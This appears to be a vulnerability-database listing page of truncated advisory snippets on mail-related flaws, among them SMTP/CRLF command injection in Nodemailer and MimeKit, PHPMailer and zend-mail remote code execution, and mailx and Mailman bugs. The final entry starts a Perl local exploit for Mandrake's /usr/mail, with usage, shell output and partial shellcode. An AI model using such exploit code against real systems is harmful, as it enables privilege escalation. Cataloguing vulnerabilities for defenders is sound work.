Important: .NET 10.0 security update

.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 10.0.106 and .NET Runtime...

Nodemailer has SMTP command injection due to unsanitized `envelope.size` parameter

Summary When a custom envelope object is passed to sendMail with a size property containing CRLF characters \r\n, the value is concatenated directly into the SMTP MAIL FROM command without sanitization. This allows injection of arbitrary SMTP commands, including RCPT TO — silently adding...

AlmaLinux 9 : python3.12 (ALSA-2026:4165)

The remote AlmaLinux 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the ALSA-2026:4165 advisory. cpython: IMAP command injection in user-controlled commands CVE-2025-15366 cpython: POP3 command injection in user-controlled commands CVE-2025-15367...

ALSA-2026:4165 Moderate: python3.12 security update

Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems. Security Fixes:...

MimeKit has CRLF Injection in Quoted Local-Part that Enables SMTP Command Injection and Email Forgery

Summary A CRLF Injection vulnerability in MimeKit 4.15.0 allows an attacker to embed \r\n into the SMTP envelope address local-part when the local-part is a quoted-string. This is non-compliant with RFC 5321 and can result in SMTP command injection e.g., injecting additional RCPT TO / DATA / RSET...

EUVD-1999-0995

Malware in sbrugna...

Improper Neutralization

Overview Affected versions of this package are vulnerable to Improper Neutralization via the handling of SMTP message input. An attacker can inject arbitrary SMTP commands by supplying specially crafted input containing carriage return and line feed characters. Remediation Upgrade...

SUSE CVE-2003-0991

Unknown vulnerability in the mail command handler in Mailman before 2.0.14 allows remote attackers to cause a denial of service crash via malformed e-mail commands...

PT-2022-20459 · Nextcloud +1 · Nextcloud Server +1

Name of the Vulnerable Software and Affected Versions: Nextcloud server versions prior to 22.2.8 Nextcloud server versions prior to 23.0.5 Nextcloud server versions prior to 24.0.1 Description: The Nextcloud server is an open source personal cloud server. Affected versions were found to be...

Remote Code Execution (RCE)

PHPMailer is vulnerable to remote code execution RCE attacks. A malicious user can inject and execute arbitrary code by passing extra parameters to the mail command. This is due to the improper interaction with the library's escapeshellarg function and internal escaping function performed in PHP...

CVE-2016-10034

The setFrom function in the Sendmail adapter in the zend-mail component before 2.4.11, 2.5.x, 2.6.x, and 2.7.x before 2.7.2, and Zend Framework before 2.4.11 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " backslash double...

CVE-2016-10033

The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " backslash double quote in a crafted Sender property...

DEBIAN-CVE-2016-10033

The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " backslash double quote in a crafted Sender property...

CVE-2016-10033

The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " backslash double quote in a crafted Sender property...

CVE-2016-10033

The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \” backslash double quote in a crafted Sender property. Recent assessments: Assessed Attacker Value: 0...

Send-Only Postfix Server

Postfix is an MTA Mail Transfer Agent, an application used to send and receive email. In this tutorial, we will install and configure Postfix so that it can be used to send emails by local applications only. Why would you want to do that? If you’re already using a third-party email provider for...

[SECURITY] Fedora 21 Update: mailx-12.5-14.fc21

Mailx is an enhanced mail command, which provides the functionality of the POSIX mailx command, as well as SysV mail and Berkeley Mail from which it is derived. Additionally to the POSIX features, mailx can work with Maildir/ e-mail storage format as well as mailboxes, supports IMAP, POP3 and SMT...

[SECURITY] Fedora 19 Update: mailx-12.5-9.fc19

Mailx is an enhanced mail command, which provides the functionality of the POSIX mailx command, as well as SysV mail and Berkeley Mail from which it is derived. Additionally to the POSIX features, mailx can work with Maildir/ e-mail storage format as well as mailboxes, supports IMAP, POP3 and SMT...

[SECURITY] [DSA 3104-1] bsd-mailx security update

------------------------------------------------------------------------- Debian Security Advisory DSA-3104-1 [email protected] http://www.debian.org/security/ Florian Weimer December 16, 2014 http://www.debian.org/security/faq -...

Mandrake Linux 8.2 /usr/mail local exploit (d86mail.pl)

No description provided by source. !/usr/bin/perl Mandrake 8.2 /usr/mail local exploit Usage: perl d86mail.pl offset Then enter "." dot and press 'Enter' Example: satan@localhost my$ perl d86mail.pl eip: 0xbffffddd .enter Cc: too long to edit sh-2.05$ $shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x8...